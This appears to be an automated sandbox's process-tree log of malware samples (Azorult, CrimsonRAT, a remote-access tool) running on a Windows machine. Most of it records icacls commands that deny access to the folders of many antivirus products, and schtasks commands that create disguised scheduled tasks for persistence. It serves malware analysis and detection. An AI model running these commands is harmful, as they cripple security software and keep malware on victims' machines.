      Possible privilege escalation attempt
      Modifies file permissions
      PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
    3⤵
    PID:3872
  - - C:\Windows\SysWOW64\icacls.exe
      icacls c:\programdata\Malwarebytes /deny Admin:(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    PID:5312
  - - C:\Windows\SysWOW64\icacls.exe
      icacls c:\programdata\Malwarebytes /deny System:(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:4292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
    3⤵
    PID:1572
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\MB3Install /deny Admin:(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    PID:1864
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\MB3Install /deny System:(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2056
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    PID:2492
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:840
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5180
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:5592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6000
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:6088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4644
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5208
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1716
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4724
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    PID:900
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2372
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5892
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5904
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5988
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:3092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3816
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1876
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5032
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4596
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:1064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4532
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4540
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3372
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3496
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:4112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1232
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5540
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2696
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2612
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4004
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:5536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5216
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1580
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    PID:5032
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5940
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:324
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:6000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1620
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4764
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:4384
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3764
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3468
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2784
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2956
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5824
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5204
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3496
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:1572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3612
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:1636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3092
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4536
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5988
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3292
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    3⤵
    PID:2500
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5216
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:724
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    PID:2008
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:6088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:920
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4676
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5248
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5464
- C:\Users\Admin\Downloads\Azorult.exe
  "C:\Users\Admin\Downloads\Azorult.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:4624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7256 /prefetch:1
  2⤵
  PID:4828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6636 /prefetch:1
  2⤵
  PID:3276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7676 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2060 /prefetch:8
  2⤵
  PID:5952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7544 /prefetch:8
  2⤵
  PID:4608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2120 /prefetch:1
  2⤵
  PID:3552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5696 /prefetch:8
  2⤵
  PID:876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7224 /prefetch:8
  2⤵
  PID:3200
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7120 /prefetch:1
  2⤵
  PID:540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
  2⤵
  PID:856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7684 /prefetch:1
  2⤵
  PID:2008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7612 /prefetch:8
  2⤵
  PID:2680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5856 /prefetch:8
  2⤵
  PID:4340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6604 /prefetch:8
  2⤵
  PID:3360
- C:\Users\Admin\Downloads\CrimsonRAT.exe
  "C:\Users\Admin\Downloads\CrimsonRAT.exe"
  2⤵
  - Executes dropped EXE
  PID:4540
- C:\Users\Admin\Downloads\CrimsonRAT.exe
  "C:\Users\Admin\Downloads\CrimsonRAT.exe"
  2⤵
  - Executes dropped EXE
  PID:1880
- C:\Users\Admin\Downloads\CrimsonRAT.exe
  "C:\Users\Admin\Downloads\CrimsonRAT.exe"
  2⤵
  - Executes dropped EXE
  PID:5272

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3956

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2680

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultdbc198b7h2062h4f80h9826hbf33fe4d21e5
1⤵
PID:6092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0x104,0x12c,0x7ffd119a46f8,0x7ffd119a4708,0x7ffd119a4718
  2⤵
  PID:3328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,668267397569218100,9135588262401024232,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:2
  2⤵
  PID:5552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,668267397569218100,9135588262401024232,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 /prefetch:3
  2⤵
  PID:5544

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
PID:4120

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1148
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2508
